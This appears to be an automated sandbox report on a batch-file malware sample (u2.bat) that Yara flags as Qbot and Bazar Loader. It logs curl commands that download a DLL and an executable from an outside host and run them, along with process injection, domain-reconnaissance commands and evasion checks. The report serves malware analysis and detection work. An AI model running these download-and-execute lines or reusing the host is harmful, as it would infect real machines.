Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6928:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3104:120:WilError_03
Source: C:\Windows\System32\wermgr.exe	Mutant created: \Sessions\1\BaseNamedObjects\{6B4E5A8F-03E1-4126-AAB7-090D37460596}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6600:120:WilError_03
Source: C:\Windows\System32\wermgr.exe	Mutant created: \Sessions\1\BaseNamedObjects\{9263F157-4717-4ABA-8EFD-70F4E97A0B5D}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6460:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6832:120:WilError_03
Source: C:\Windows\System32\wermgr.exe	Mutant created: \Sessions\1\BaseNamedObjects\wskctabigvrftilyolne

Source: unknown

Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\u2.bat" "

Source: C:\Windows\System32\wermgr.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\curl.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\rundll32.exe rundll32.exe 02.dll,checkit

Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\u2.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -o 02.dll https://upd5.pro/update/02.dll
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe 02.dll,checkit
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\wermgr.exe C:\Windows\System32\wermgr.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -o qd_x86.exe https://upd5.pro/update/qd_x86.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 5 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\Desktop\qd_x86.exe qd_x86.exe
Source: C:\Windows\System32\wermgr.exe	Process created: C:\Windows\System32\ipconfig.exe ipconfig /all
Source: C:\Windows\System32\ipconfig.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wermgr.exe	Process created: C:\Windows\System32\whoami.exe whoami /all
Source: C:\Windows\System32\whoami.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wermgr.exe	Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trusts
Source: C:\Windows\System32\nltest.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wermgr.exe	Process created: C:\Windows\System32\qwinsta.exe qwinsta
Source: C:\Windows\System32\qwinsta.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -o 02.dll https://upd5.pro/update/02.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe 02.dll,checkit	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -o qd_x86.exe https://upd5.pro/update/qd_x86.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 5 localhost	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\Desktop\qd_x86.exe qd_x86.exe	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\wermgr.exe C:\Windows\System32\wermgr.exe	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Process created: C:\Windows\System32\ipconfig.exe ipconfig /all	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Process created: C:\Windows\System32\whoami.exe whoami /all	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trusts	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Process created: C:\Windows\System32\qwinsta.exe qwinsta	Jump to behavior

Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qd_x86.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\qd_x86.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\qd_x86.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\qd_x86.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\qd_x86.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\qd_x86.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Users\user\Desktop\qd_x86.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\Desktop\qd_x86.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\qd_x86.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\qd_x86.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\qd_x86.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\qd_x86.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\qd_x86.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\whoami.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\whoami.exe	Section loaded: authz.dll	Jump to behavior
Source: C:\Windows\System32\whoami.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\whoami.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\whoami.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\qwinsta.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\System32\qwinsta.exe	Section loaded: utildll.dll	Jump to behavior
Source: C:\Windows\System32\qwinsta.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\qwinsta.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msi.dll	Jump to behavior

Source:	Binary string: conhost.pdbUGP source: 02.dll.2.dr
Source:	Binary string: Z:\j\projects\qbot4\Release\Win32\qd_x86.pdb source: qd_x86.exe, 00000008.00000000.1799435968.0000000000DC8000.00000002.00000001.01000000.00000006.sdmp, qd_x86.exe, 00000008.00000002.1800368210.0000000000DC8000.00000002.00000001.01000000.00000006.sdmp, qd_x86.exe.5.dr
Source:	Binary string: C:\testing3\data\bdnc\BDNIMBUS-3071711\BDNIMBUS\bin\release\bdnc.pdb source: rundll32.exe, 00000003.00000002.1739313508.0000000180252000.00000002.00000001.01000000.00000003.sdmp
Source:	Binary string: conhost.pdb source: 02.dll.2.dr

Contains functionality to dynamically determine API calls

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_000000018004FBF0 GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,

3_2_000000018004FBF0

PE file contains sections with non-standard names

Source: 02.dll.2.dr

Static PE information: section name: .didat

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001898475C501 push rsp; ret	3_2_000001898475C50B
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00000189847595F7 push rdx; ret	3_2_00000189847595F8
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000018984759983 push 7E2E5DE3h; iretd	3_2_0000018984759989
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000018984755A7A push 3A22A9C9h; retf	3_2_0000018984755A87
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001898475AB9D push rsp; ret	3_2_000001898475ABC4
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00000189847244D4 push ebx; iretd	3_2_00000189847244DD
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001898472634A push cs; retn 0000h	3_2_0000018984726386
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000018984724458 push ebx; iretd	3_2_00000189847244DD
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00000189847239DD push ds; ret	3_2_00000189847239E5
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: 8_2_00DB4D3B push ecx; ret	8_2_00DB4D4E
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: 8_2_00D66EC0 push ecx; ret	8_2_00D66ED3

Persistence and Installation Behavior

Uses ipconfig to lookup or modify the Windows network settings

Source: C:\Windows\System32\wermgr.exe

Process created: C:\Windows\System32\ipconfig.exe ipconfig /all

Drops PE files

Source: C:\Windows\System32\curl.exe	File created: C:\Users\user\Desktop\qd_x86.exe			Jump to dropped file
Source: C:\Windows\System32\curl.exe	File created: C:\Users\user\Desktop\02.dll			Jump to dropped file

Boot Survival

Uses whoami command line tool to query computer and username

Source: C:\Windows\System32\wermgr.exe	Process created: C:\Windows\System32\whoami.exe whoami /all
Source: C:\Windows\System32\wermgr.exe	Process created: C:\Windows\System32\whoami.exe whoami /all			Jump to behavior

Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\whoami.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\whoami.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Check for Windows Defender sandbox

Source: C:\Windows\System32\rundll32.exe

File Queried: C:\INTERNAL\__empty

Jump to behavior

Queries memory information (via WMI often done to detect virtual machines)

Source: C:\Windows\System32\wermgr.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : select * from Win32_PhysicalMemory

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Source: C:\Windows\System32\wermgr.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : select Caption,Description,DeviceID,Manufacturer,Name,PNPDeviceID,Service,Status from Win32_PnPEntity

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Windows\System32\wermgr.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : select * from Win32_DiskDrive

Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)

Source: C:\Windows\System32\wermgr.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : select * from Win32_PhysicalMemory

Uses ping.exe to sleep

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 5 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 5 localhost			Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\wermgr.exe

Window / User API: threadDelayed 1182

Jump to behavior

Found evasive API chain checking for process token information

Source: C:\Users\user\Desktop\qd_x86.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

Found large amount of non-executed APIs

Source: C:\Windows\System32\rundll32.exe

API coverage: 2.3 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\rundll32.exe TID: 6808

Thread sleep count: 184 > 30

Jump to behavior

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Windows\System32\wermgr.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : select * from Win32_Bios

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\Windows\System32\wermgr.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\qd_x86.exe

Code function: 8_2_00D98074 FindFirstFileExW,FindNextFileW,FindClose,FindClose,

8_2_00D98074

Source: C:\Users\user\Desktop\qd_x86.exe

Code function: 8_2_00D64540 GetSystemInfo,

8_2_00D64540

Source: curl.exe, 00000005.00000003.1757684017.000001B929403000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllAAS
Source: curl.exe, 00000002.00000003.1705495023.0000014861385000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllKK0[P

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_00000001802432BC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

3_2_00000001802432BC

Contains functionality to dynamically determine API calls

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_000000018004FBF0 GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,

3_2_000000018004FBF0

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\qd_x86.exe

Code function: 8_2_00D9D5EA GetProcessHeap,

8_2_00D9D5EA

Enables debug privileges

Source: C:\Windows\System32\whoami.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\whoami.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\whoami.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00000001802432BC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_00000001802432BC
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180227ED0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_0000000180227ED0
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: 8_2_00D922A5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_00D922A5
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: 8_2_00D66C0A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_00D66C0A
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: 8_2_00D66DA0 SetUnhandledExceptionFilter,	8_2_00D66DA0
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: 8_2_00D672F7 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_00D672F7

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Windows\System32\rundll32.exe	Memory allocated: C:\Windows\System32\wermgr.exe base: 22090C90000 protect: page execute and read and write			Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Memory allocated: C:\Windows\System32\wermgr.exe base: 22090CC0000 protect: page read and write			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Windows\System32\rundll32.exe

Memory written: C:\Windows\System32\wermgr.exe base: 22090C90000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\System32\rundll32.exe	Memory written: C:\Windows\System32\wermgr.exe base: 22090CC0000	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Memory written: C:\Windows\System32\wermgr.exe base: 22090C90000	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Memory written: C:\Windows\System32\wermgr.exe base: 7FF783FA6590	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -o 02.dll https://upd5.pro/update/02.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe 02.dll,checkit	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -o qd_x86.exe https://upd5.pro/update/qd_x86.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 5 localhost	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\Desktop\qd_x86.exe qd_x86.exe	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\wermgr.exe C:\Windows\System32\wermgr.exe	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Process created: C:\Windows\System32\ipconfig.exe ipconfig /all	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Process created: C:\Windows\System32\whoami.exe whoami /all	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trusts	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Process created: C:\Windows\System32\qwinsta.exe qwinsta	Jump to behavior

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\qd_x86.exe

Code function: 8_2_00D67109 cpuid

8_2_00D67109

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\qd_x86.exe	Code function: EnumSystemLocalesW,	8_2_00D92779
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: EnumSystemLocalesW,	8_2_00D928E6
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: EnumSystemLocalesW,	8_2_00D92918
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: EnumSystemLocalesW,	8_2_00D9CCD6
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: EnumSystemLocalesW,	8_2_00D9CC6B
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: EnumSystemLocalesW,	8_2_00D9CC6D
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	8_2_00D9CDFC
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: EnumSystemLocalesW,	8_2_00D9CD71
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: GetLocaleInfoW,	8_2_00D9D04F
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	8_2_00D9D178
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: GetLocaleInfoW,	8_2_00D9325F
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: GetLocaleInfoW,	8_2_00D9D27E
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	8_2_00D9D354

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qd_x86.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qd_x86.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\qd_x86.exe

Code function: 8_2_00D613B0 CreateNamedPipeA,ConnectNamedPipe,GetLastError,ReadFile,GetLastError,DisconnectNamedPipe,

8_2_00D613B0

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_00000001800744F0 GetProcAddress,GetSystemTimeAsFileTime,

3_2_00000001800744F0

Source: C:\Users\user\Desktop\qd_x86.exe

8_2_00D61AD0

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_0000000180061840 GetVersion,RegOpenKeyExA,GetLastError,RegOpenKeyExA,GetLastError,RegCloseKey,RegCloseKey,RegOpenKeyExA,GetLastError,RegCloseKey,

3_2_0000000180061840

Source: C:\Windows\System32\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Windows\System32\wermgr.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected Bazar Loader

Source: Yara match	File source: 3.2.rundll32.exe.1898470060d.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.1740122551.0000018984731000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1740081515.0000018984700000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected Qbot

Source: Yara match	File source: 3.2.rundll32.exe.1898470280d.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.18984734000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.1898470280d.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.1898470060d.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.18984734000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.1898470060d.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.1740153839.0000018984734000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1740300202.00000189849C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1740238507.0000018984761000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1740081515.0000018984700000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected Bazar Loader

Source: Yara match	File source: 3.2.rundll32.exe.1898470060d.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.1740122551.0000018984731000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1740081515.0000018984700000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected Qbot

Source: Yara match	File source: 3.2.rundll32.exe.1898470280d.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.18984734000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.1898470280d.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.1898470060d.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.18984734000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.1898470060d.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.1740153839.0000018984734000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1740300202.00000189849C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1740238507.0000018984761000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1740081515.0000018984700000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_000000018007BAC0 bind,WSAGetLastError,WSAGetLastError,

3_2_000000018007BAC0

ID:	1427740
Product:	CloudBasic
Start time:	03:19:08
Start date:	18.04.2024
Sample:	u2.bat
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	acaf01f83da439915027c3e2e900c8dd
SHA1:	2861b4e463fa89e05f2d7d629fae5140cef49843
